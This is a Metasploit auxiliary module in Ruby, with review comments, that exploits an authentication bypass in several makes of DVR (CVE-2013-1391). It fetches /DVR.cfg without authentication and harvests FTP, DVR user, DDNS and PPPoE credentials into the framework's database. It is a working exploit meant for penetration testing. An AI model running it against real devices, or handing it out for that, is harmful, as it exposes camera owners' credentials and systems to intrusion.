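##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary scanner: fetches the unauthenticated `/DVR.cfg` export from
# affected DVR web interfaces (CVE-2013-1391), stores it as loot and records
# the credentials and services it contains in the database.
#
# Cleanups versus the earlier revision: `report_cred` was defined twice
# (the second, identical definition silently replaced the first), an unused
# local (`user_active`) was dropped, `and`/`or`/`not` were replaced with
# `&&`/`||`/`!`, and the repeated "regex then $1" extraction is centralised
# in `conf_value`.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name' => 'Multiple DVR Manufacturers Configuration Disclosure',
      'Description' => %q{
        This module takes advantage of an authentication bypass vulnerability at the
        web interface of multiple manufacturers DVR systems, which allows to retrieve the
        device configuration.
      },
      'Author' => [
        'Alejandro Ramos', # Vulnerability Discovery
        'juan vazquez' # Metasploit module
      ],
      'References' => [
        [ 'CVE', '2013-1391' ],
        [ 'URL', 'http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html' ]
      ],
      'License' => MSF_LICENSE,
      # The module issues a single GET and never writes to the device;
      # the request is visible in the DVR's web server logs.
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS],
        'Reliability' => []
      }
    )
  end

  # Records PPPoE credentials found in the configuration as a note.
  #
  # Skips the record when the config explicitly disables PPPoE (PPPOE_EN=0)
  # or when either the user or the password is absent. A missing PPPOE_EN
  # key is treated the same as enabled, as before.
  #
  # @param conf [String] raw DVR.cfg body
  # @return [void]
  def get_pppoe_credentials(conf)
    return if conf_value(conf, 'PPPOE_EN', '\d') == "0"

    user = conf_value(conf, 'PPPOE_USER')
    password = conf_value(conf, 'PPPOE_PASSWORD')
    return if user.empty? || password.empty?

    # NOTE: this note uses :username while the DDNS note uses :user; the keys
    # are kept as-is because existing database consumers may rely on them.
    info = {
      :host => rhost,
      :username => user,
      :password => password
    }

    report_note({
      :host => rhost,
      :data => info,
      :type => "dvr.pppoe.conf",
      :sname => 'pppoe',
      :update => :unique_data
    })
  end

  # Records dynamic-DNS account details found in the configuration as a note.
  #
  # Skips the record when DDNS is explicitly disabled (DDNS_EN=0) or when no
  # hostname is present; an empty user/password is still recorded.
  #
  # @param conf [String] raw DVR.cfg body
  # @return [void]
  def get_ddns_credentials(conf)
    return if conf_value(conf, 'DDNS_EN', '\d') == "0"

    hostname = conf_value(conf, 'DDNS_HOSTNAME')
    user = conf_value(conf, 'DDNS_USER')
    password = conf_value(conf, 'DDNS_PASSWORD')
    return if hostname.empty?

    info = {
      :host => hostname,
      :user => user,
      :password => password
    }

    report_note({
      :host => rhost,
      :data => info,
      :type => "dvr.ddns.conf",
      :sname => 'ddns',
      :update => :unique_data
    })
  end

  # Records the FTP upload account found in the configuration as a credential
  # against the configured FTP server (not against the DVR itself).
  #
  # @param conf [String] raw DVR.cfg body
  # @return [void]
  def get_ftp_credentials(conf)
    server = conf_value(conf, 'FTP_SERVER')
    user = conf_value(conf, 'FTP_USER')
    password = conf_value(conf, 'FTP_PASSWORD')
    port = conf_value(conf, 'FTP_PORT')
    return if server.empty?

    # NOTE(review): `server` comes straight from the device config and may be
    # a hostname rather than an IP, and `port` is a String (possibly empty
    # when FTP_PORT is absent); confirm the credential API accepts both.
    report_cred(
      ip: server,
      port: port,
      service_name: 'ftp',
      user: user,
      password: password,
      proof: conf.inspect
    )
  end

  # Creates a credential core plus an UNTRIED login for the given service.
  #
  # @param opts [Hash] :ip, :port, :service_name, :user, :password, :proof
  # @return [Object] result of create_credential_login
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      # Nothing is validated here; the login is only recorded for later testing.
      status: Metasploit::Model::Login::Status::UNTRIED,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Records every USER<n>_* account from the configuration as a credential
  # against the DVR's own web service.
  #
  # The account's login flag (USER<n>_LOGIN) is not used to filter; it is
  # only carried in the proof string so an analyst can see disabled accounts.
  #
  # @param conf [String] raw DVR.cfg body
  # @return [void]
  def get_dvr_credentials(conf)
    # scan yields one-element arrays, e.g. [["1"], ["2"]]; `(user_id)`
    # destructures the id out of each.
    conf.scan(/USER(\d+)_USERNAME/).each do |(user_id)|
      active = conf_value(conf, "USER#{user_id}_LOGIN")
      user = conf_value(conf, "USER#{user_id}_USERNAME")
      password = conf_value(conf, "USER#{user_id}_PASSWORD")

      report_cred(
        ip: rhost,
        port: rport,
        service_name: 'dvr',
        user: user,
        password: password,
        proof: "user_id: #{user_id}, active: #{active}"
      )
    end
  end

  # Scanner entry point for a single host.
  #
  # Fetches /DVR.cfg, sanity-checks that it looks like a DVR configuration
  # (HTTP 200, non-empty, contains "CAMERA"), stores it as loot, then
  # extracts FTP, DVR user, DDNS and PPPoE data and reports the service.
  #
  # @param ip [String] target address supplied by the Scanner mixin (rhost is used below)
  # @return [void]
  def run_host(ip)
    res = send_request_cgi({
      'uri' => '/DVR.cfg',
      'method' => 'GET'
    })

    if !res || res.code != 200 || res.body.empty? || res.body !~ /CAMERA/
      vprint_error("#{rhost}:#{rport} - DVR configuration not found")
      return
    end

    conf = res.body
    loot_path = store_loot("dvr.configuration", "text/plain", rhost, conf, "DVR.cfg")
    vprint_good("#{rhost}:#{rport} - DVR configuration stored in #{loot_path}")

    get_ftp_credentials(conf)
    get_dvr_credentials(conf)
    get_ddns_credentials(conf)
    get_pppoe_credentials(conf)

    dvr_name = conf_value(conf, 'DVR_NAME')

    report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => "DVR NAME: #{dvr_name}")
    print_good("#{rhost}:#{rport} DVR #{dvr_name} found")
  end

  private

  # Returns the first value of `KEY=<value>` in the config, or "" if the key
  # is absent. `value_re` is the (unanchored) pattern for the value; the
  # default `.*` runs to the end of the line, matching the original `$1`
  # extraction.
  #
  # NOTE(review): `.` matches "\r", so on a CRLF-terminated config the value
  # would keep a trailing carriage return — confirm against a real sample
  # before trimming, since passwords must be stored exactly as exported.
  #
  # @param conf [String] raw DVR.cfg body
  # @param key [String] literal key name (escaped before use in the regex)
  # @param value_re [String] regex source for the value capture
  # @return [String]
  def conf_value(conf, key, value_re = '.*')
    conf[/#{Regexp.escape(key)}=(#{value_re})/, 1] || ""
  end
end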